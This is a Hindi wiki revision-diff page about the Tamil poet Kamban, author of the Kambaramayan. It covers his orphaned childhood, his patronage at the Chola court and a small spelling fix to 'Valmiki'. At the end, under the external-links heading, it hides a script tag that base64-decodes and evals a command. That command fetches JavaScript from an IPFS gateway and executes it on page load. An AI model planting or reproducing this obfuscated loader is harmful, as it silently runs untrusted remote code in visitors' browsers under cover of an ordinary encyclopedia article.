Difference between revisions of "कंबन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 5: Line 5:
 
कंबन का कुछ समय विद्वान  बारहवीं शताब्दी और कुछ नवीं शताब्दी मानते हैं। कंबन का वास्तविक नाम का पता नहीं है। कंबन उनका उपनाम था। कंबन के माता-पिता का उनकी बाल्यावस्था में ही देहांत हो गया। अनाथ बालक को पालने वाला कोई न था। उनके दूर के एक संबंधी अर्काट जिले के सदैयप्प वल्लल नामक धनी किसान के दरवाजे पर चुपचाप छोड़ आए। दयालु वल्लल ने बालक को अपने बच्चों की देख-रेख के काम के लिए अपने घर में रख लिया। जब उन्होंने देखा कि उनके बच्चों के साथ कंबन भी पढ़ने में रुचि लेने लगा है तो सदैयप्प वल्लल ने कंबन की शिक्षा का भी पूरा प्रबंध कर दिया। इस प्रकार कंबन को विद्या प्राप्त हुई और उनके अंदर से काव्य की प्रतिभा प्रस्फुटित हो गई।  
 
कंबन का कुछ समय विद्वान  बारहवीं शताब्दी और कुछ नवीं शताब्दी मानते हैं। कंबन का वास्तविक नाम का पता नहीं है। कंबन उनका उपनाम था। कंबन के माता-पिता का उनकी बाल्यावस्था में ही देहांत हो गया। अनाथ बालक को पालने वाला कोई न था। उनके दूर के एक संबंधी अर्काट जिले के सदैयप्प वल्लल नामक धनी किसान के दरवाजे पर चुपचाप छोड़ आए। दयालु वल्लल ने बालक को अपने बच्चों की देख-रेख के काम के लिए अपने घर में रख लिया। जब उन्होंने देखा कि उनके बच्चों के साथ कंबन भी पढ़ने में रुचि लेने लगा है तो सदैयप्प वल्लल ने कंबन की शिक्षा का भी पूरा प्रबंध कर दिया। इस प्रकार कंबन को विद्या प्राप्त हुई और उनके अंदर से काव्य की प्रतिभा प्रस्फुटित हो गई।  
 
==काव्य रचना==
 
==काव्य रचना==
सदैयप्प वल्लल का चोल राजा के दरबार में प्रवेश था। कंबन भी उनके साथ जाने लगा। एक दिन कंबन की कविता से प्रभावित होकर राजा ने उन्हें अपने दरबार का कवि बना लिया। राजा ने और वल्लल ने कंबन की काव्य प्रतिभा देखकर उनसे आग्रह किया कि वे बाल्मीकि रामायण के आधार पर तमिल भाषा में [[राम]] काव्य की रचना करें। इस पर कंबन ने तमिल भाषा में रचना कर डाली। यही रचना आज भी ‘कंबरामायण’ के नाम से प्रसिद्ध है। कंबरामायण में 10 हजार 50 पद हैं और यह बालकांड से युद्धकांड तक 6 कांडों में विभक्त है। उनके रचे हुए ग्यारह ग्रंथ और हैं, पर सर्वाधिक प्रसिद्ध ‘कंबरामायण’ ही है। इसमें कवि ने द्रविण सभ्यता का वर्णन विशेष रूप से किया है। कवि-सम्राट के सम्मान से विभूषित कंबन को तमिल भाषा का [[बाल्मीकि]] कहा जाता है। एक मत के अनुसार यह रचना 1178 ई. में पूरी हुई थी।<ref>{{cite book | last =लीलाधर | first =शर्मा  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय  | language =[[हिन्दी]]  | pages =123| chapter = }}
+
सदैयप्प वल्लल का चोल राजा के दरबार में प्रवेश था। कंबन भी उनके साथ जाने लगा। एक दिन कंबन की कविता से प्रभावित होकर राजा ने उन्हें अपने दरबार का कवि बना लिया। राजा ने और वल्लल ने कंबन की काव्य प्रतिभा देखकर उनसे आग्रह किया कि वे बाल्मीकि रामायण के आधार पर तमिल भाषा में [[राम]] काव्य की रचना करें। इस पर कंबन ने तमिल भाषा में रचना कर डाली। यही रचना आज भी ‘कंबरामायण’ के नाम से प्रसिद्ध है। कंबरामायण में 10 हजार 50 पद हैं और यह बालकांड से युद्धकांड तक 6 कांडों में विभक्त है। उनके रचे हुए ग्यारह ग्रंथ और हैं, पर सर्वाधिक प्रसिद्ध ‘कंबरामायण’ ही है। इसमें कवि ने द्रविण सभ्यता का वर्णन विशेष रूप से किया है। कवि-सम्राट के सम्मान से विभूषित कंबन को तमिल भाषा का [[वाल्मीकि]] कहा जाता है। एक मत के अनुसार यह रचना 1178 ई. में पूरी हुई थी।<ref>{{cite book | last =लीलाधर | first =शर्मा  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय  | language =[[हिन्दी]]  | pages =123| chapter = }}
 
</ref>
 
</ref>
 
   
 
   
Line 13: Line 13:
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 10:37, 27 May 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

tamil bhasha ke prasiddh granth ‘kanbaramayan’ ke rachiyata kanban ka janm tamilanadu ke chol rajy mean tiruvaluanpoor namak gaanv mean hua tha.

jivan parichay

kanban ka kuchh samay vidvan barahavian shatabdi aur kuchh navian shatabdi manate haian. kanban ka vastavik nam ka pata nahian hai. kanban unaka upanam tha. kanban ke mata-pita ka unaki balyavastha mean hi dehaant ho gaya. anath balak ko palane vala koee n tha. unake door ke ek sanbandhi arkat jile ke sadaiyapp vallal namak dhani kisan ke daravaje par chupachap chho d ae. dayalu vallal ne balak ko apane bachchoan ki dekh-rekh ke kam ke lie apane ghar mean rakh liya. jab unhoanne dekha ki unake bachchoan ke sath kanban bhi padhane mean ruchi lene laga hai to sadaiyapp vallal ne kanban ki shiksha ka bhi poora prabandh kar diya. is prakar kanban ko vidya prapt huee aur unake aandar se kavy ki pratibha prasphutit ho gee.

kavy rachana

sadaiyapp vallal ka chol raja ke darabar mean pravesh tha. kanban bhi unake sath jane laga. ek din kanban ki kavita se prabhavit hokar raja ne unhean apane darabar ka kavi bana liya. raja ne aur vallal ne kanban ki kavy pratibha dekhakar unase agrah kiya ki ve balmiki ramayan ke adhar par tamil bhasha mean ram kavy ki rachana karean. is par kanban ne tamil bhasha mean rachana kar dali. yahi rachana aj bhi ‘kanbaramayan’ ke nam se prasiddh hai. kanbaramayan mean 10 hajar 50 pad haian aur yah balakaand se yuddhakaand tak 6 kaandoan mean vibhakt hai. unake rache hue gyarah granth aur haian, par sarvadhik prasiddh ‘kanbaramayan’ hi hai. isamean kavi ne dravin sabhyata ka varnan vishesh roop se kiya hai. kavi-samrat ke samman se vibhooshit kanban ko tamil bhasha ka valmiki kaha jata hai. ek mat ke anusar yah rachana 1178 ee. mean poori huee thi.[1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh


tika tippani aur sandarbh

  1. liladhar, sharma bharatiy charit kosh (hindi). bharatadiskavari pustakalay: shiksha bharati, 123.

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>